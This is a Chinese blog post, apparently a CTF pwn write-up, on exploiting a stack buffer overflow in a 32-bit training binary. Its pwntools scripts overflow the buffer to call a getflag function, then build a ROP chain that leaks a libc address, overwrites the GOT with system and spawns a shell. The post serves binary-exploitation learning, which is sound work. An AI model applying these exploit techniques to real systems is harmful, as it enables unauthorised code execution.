ret2syscall

最新推荐文章于 2024-02-20 21:09:03 发布
最新推荐文章于 2024-02-20 21:09:03 发布
阅读量525 收藏
点赞数
分类专栏: pwn 文章标签: ret2syscall
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/86773932
版权 
xx@ubuntu:~/Documents/rop$ file pwn 
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fca490f050dcf56b71eae329ced02a9d483aacf0, not stripped
xx@ubuntu:~/Documents/rop$ checksec pwn 
[*] '/home/hu/Documents/rop/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

啥保护也没有

在ida里面打开后,发现有getflag函数,直接栈溢出
exp

from pwn import *
p=process('./pwn')
getflag=0x0804858B
payload = 'a'*(0x6c+4)+p32(getflag)
p.sendlineafter('try\n',payload)
p.interactive()

rop一下

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
p=process('./pwn')
elf=ELF('./pwn')
pop_1=0x08048381 
pop_3=0x080485fd
bss =  0x804a000+0x400
payload = 'a'*(0x6c+4)+p32(elf.plt['puts'])+p32(pop_1)+p32(elf.got['puts'])
payload += p32(elf.plt['read'])+p32(pop_3)+p32(0)+p32(elf.got['puts'])+p32(4)
payload += p32(elf.plt['read'])+p32(pop_3)+p32(0)+p32(bss)+p32(8)
payload +=p32(elf.plt['puts'])+p32(0)+p32(bss)


p.sendlineafter('try\n',payload)

put=u32(p.recv(4).ljust(4,'\x00'))
libc = LibcSearcher('puts',put)
system = put-libc.dump('puts')+libc.dump('system')

p.send(p32(system))
p.send('/bin/sh\x00')

p.interactive()
Maxmalloc
关注
专栏目录
pwn ret2syscall
young‘s blog
02-11 998
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32位静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
【PWN】07.ret2syscall
weixin_52553215的博客
11-12 2424
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
ret2syscall(pwn第二课)
最新发布
s5555555___的博客
02-20 1398
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1324
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3605
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
ROP链:ret2syscall
小龙在线
09-13 428
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2860
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
【PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 2046
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ROP-基础-ret2syscall
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1HBR7_yuCsP8awm_QNHTdAQ 提取码:uxt8 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled ...
[二进制安全学习]ret2syscall
Y4tacker的博客
07-15 433
文章目录写在前面ret2syscall参考文章 写在前面 今天再冲一个就歇息了 ret2syscall Ret2Syscall,即控制程序执行系统调用,进而获取shell 老规矩checksec 可以看出,源程序为 32 位,开启了 NX 保护。接下来利用 IDA 来查看源码,存在栈溢出 分析偏移 可以推断 s 的地址为0xffffd16c s 相对于 ebp 的偏移为0x6c s 相对于返回地址的偏移为 0x6c+4 我们利用如下系统调用来获取 shell execve("/bin/sh",NU
构造syscall调用execve的rop
05-28
在构造syscall调用execve的ROP时,我们需要找到一些适合我们需要的gadget,以及一个能够满足我们需求的内存区域来存储我们的ROP链。 以下是一个构造syscall调用execve的ROP的示例: ``` ; pop rax ; ret gadget ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值